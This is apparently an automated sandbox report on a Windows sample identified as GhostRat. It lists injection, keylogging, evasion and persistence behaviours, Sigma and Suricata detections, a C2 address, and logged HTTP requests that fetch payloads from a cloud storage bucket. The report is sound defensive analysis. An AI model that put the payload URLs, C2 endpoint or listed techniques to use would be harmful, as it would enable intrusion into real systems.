Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setupa.exe

Overview

General Information

Sample name:setupa.exe
Analysis ID:1527612
MD5:60caff11e037bac89bdb4dd789d65fd7
SHA1:2cd1508b227be4d1dbcde6a5bbe06209d52450ec
SHA256:0b9fc8ca80e9d9571057feb6302b07eb48aa7d5e587a16b13bec21a05e44696f
Tags:exeSliverFoxuser-bloated7731
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected GhostRat
AI detected suspicious sample
Allocates memory in foreign processes
Contain functionality to detect virtual machines
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates files in the system32 config directory
Injects a PE file into a foreign processes
Installs new ROOT certificates
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • setupa.exe (PID: 4768 cmdline: "C:\Users\user\Desktop\setupa.exe" MD5: 60CAFF11E037BAC89BDB4DD789D65FD7)
    • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • dllhost.exe (PID: 1308 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • svchost.exe (PID: 6188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2440 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • upupoo-classicshell.exe (PID: 1308 cmdline: "C:\Users\Public\Documents\upupoo-classicshell.exe" MD5: 606CDA46E88CE86AE85AC92B2B560D0A)
        • svchost.exe (PID: 3636 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • upupoo-classicshell.exe (PID: 5696 cmdline: "C:\Program Files\upupoo-classicshell.exe" MD5: 606CDA46E88CE86AE85AC92B2B560D0A)
      • svchost.exe (PID: 5740 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WerFault.exe (PID: 3148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.svchost.exe.4553003.5.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              12.3.svchost.exe.2c6c05b.1.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                4.3.svchost.exe.28a305b.6.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  4.3.svchost.exe.28a305b.8.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    4.3.svchost.exe.4453003.0.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 55 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\upupoo-classicshell.exe" , CommandLine: "C:\Users\Public\Documents\upupoo-classicshell.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\upupoo-classicshell.exe, NewProcessName: C:\Users\Public\Documents\upupoo-classicshell.exe, OriginalFileName: C:\Users\Public\Documents\upupoo-classicshell.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 640, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Users\Public\Documents\upupoo-classicshell.exe" , ProcessId: 1308, ProcessName: upupoo-classicshell.exe
                      Sigma detected: Suspect Svchost Activity
                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files\upupoo-classicshell.exe" , ParentImage: C:\Program Files\upupoo-classicshell.exe, ParentProcessId: 5696, ParentProcessName: upupoo-classicshell.exe, ProcessCommandLine: svchost.exe, ProcessId: 5740, ProcessName: svchost.exe
                      Sigma detected: Communication To Uncommon Destination Ports
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 47.239.116.158, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 5740, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49998
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files\upupoo-classicshell.exe" , ParentImage: C:\Program Files\upupoo-classicshell.exe, ParentProcessId: 5696, ParentProcessName: upupoo-classicshell.exe, ProcessCommandLine: svchost.exe, ProcessId: 5740, ProcessName: svchost.exe
                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Documents\upupoo-classicshell.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files\upupoo-classicshell.exe, ProcessId: 5696, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WINWORD2013
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\setupa.exe", ParentImage: C:\Users\user\Desktop\setupa.exe, ParentProcessId: 4768, ParentProcessName: setupa.exe, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 640, ProcessName: lsass.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T06:39:13.355916+020020528751A Network Trojan was detected192.168.2.54970947.239.116.1586666TCP
                      2024-10-07T06:40:14.725647+020020528751A Network Trojan was detected192.168.2.54972847.239.116.1586666TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T06:39:08.962828+020020522621A Network Trojan was detected192.168.2.54970747.239.116.1586666TCP
                      2024-10-07T06:39:17.979812+020020522621A Network Trojan was detected192.168.2.54973947.239.116.1586666TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: setupa.exeVirustotal: Detection: 11%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\ClassicStartMenuDLL.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\upup.oxJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\upupoo-classicshell.exeJump to behavior
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: setupa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: \KinndigitDll\x64\Release\KinndigitDll.pdb source: setupa.exe, 00000000.00000003.2200525100.000001F5DCBB6000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, lsass.exe, 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091116393.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: c:\Users\Sware\Desktop\classic-shell\Classic-Shell-4.3.1\ClassicShellSrc\ClassicStartMenu\Setup\ClassicStartMenu.pdb source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000000.2254604894.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe.0.dr
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: z:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: x:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: v:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: t:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: r:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: p:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: n:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: l:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: j:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: h:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: f:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: b:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: y:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: w:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: u:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: s:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: q:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: o:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: m:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: k:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: i:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: g:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: e:Jump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened: c:Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile opened: [:Jump to behavior
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD2188 FindFirstFileExW,1_2_00000140ADFD2188
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC8F84 FindFirstFileExW,1_2_00000140ADFC8F84
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C22BE0 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,_wcschr,_wcschr,FindFirstFileW,FindClose,3_2_00C22BE0
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689642CDE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49709 -> 47.239.116.158:6666
                      Source: Network trafficSuricata IDS: 2052262 - Severity 1 - ET MALWARE Win32/ProcessKiller CnC Initialization M1 : 192.168.2.5:49707 -> 47.239.116.158:6666
                      Source: Network trafficSuricata IDS: 2052262 - Severity 1 - ET MALWARE Win32/ProcessKiller CnC Initialization M1 : 192.168.2.5:49739 -> 47.239.116.158:6666
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49728 -> 47.239.116.158:6666
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.239.116.158 6666Jump to behavior
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 47.239.116.158:6666
                      Source: Joe Sandbox ViewASN Name: CHARTER-20115US CHARTER-20115US
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.239.116.158
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02583330 recv,timeGetTime,_memmove,4_2_02583330
                      Source: global trafficHTTP traffic detected: GET /ClassicStartMenuDLL.dll HTTP/1.1Connection: Keep-AliveUser-Agent: SecureWinHTTP/1.0Host: kehu8.oss-cn-hongkong.aliyuncs.com
                      Source: global trafficHTTP traffic detected: GET /upup.ox HTTP/1.1Connection: Keep-AliveUser-Agent: SecureWinHTTP/1.0Host: kehu8.oss-cn-hongkong.aliyuncs.com
                      Source: global trafficHTTP traffic detected: GET /upupoo-classicshell.exe HTTP/1.1Connection: Keep-AliveUser-Agent: SecureWinHTTP/1.0Host: kehu8.oss-cn-hongkong.aliyuncs.com
                      Source: global trafficDNS traffic detected: DNS query: kehu8.oss-cn-hongkong.aliyuncs.com
                      Source: lsass.exe, 00000001.00000002.3350014220.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
                      Source: svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350136674.000002D754513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2316259625.000002D75457F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                      Source: svchost.exe, 00000008.00000002.3350658881.000002D754579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utili0728275966HRDQJD
                      Source: svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350920486.000002D75457F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                      Source: svchost.exe, 00000008.00000002.3352993743.000002D754CB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3347254806.000002D753EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                      Source: svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbA
                      Source: svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: upupoo-classicshell.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA.crt0
                      Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091170330.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: lsass.exe, 00000001.00000003.2253656839.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3349368569.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091205038.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3350706270.00000140AE19A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: lsass.exe, 00000001.00000003.2221645884.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090575824.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000003.2258013428.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3351186509.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: svchost.exe, 00000008.00000002.3348244944.000002D753EDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3363402606.000001428B127000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091170330.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: lsass.exe, 00000001.00000003.2253656839.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3349368569.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091205038.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3350706270.00000140AE19A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: lsass.exe, 00000001.00000003.2221645884.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090575824.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000003.2258013428.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3351186509.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: upupoo-classicshell.exe.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigning-g1.crl03
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
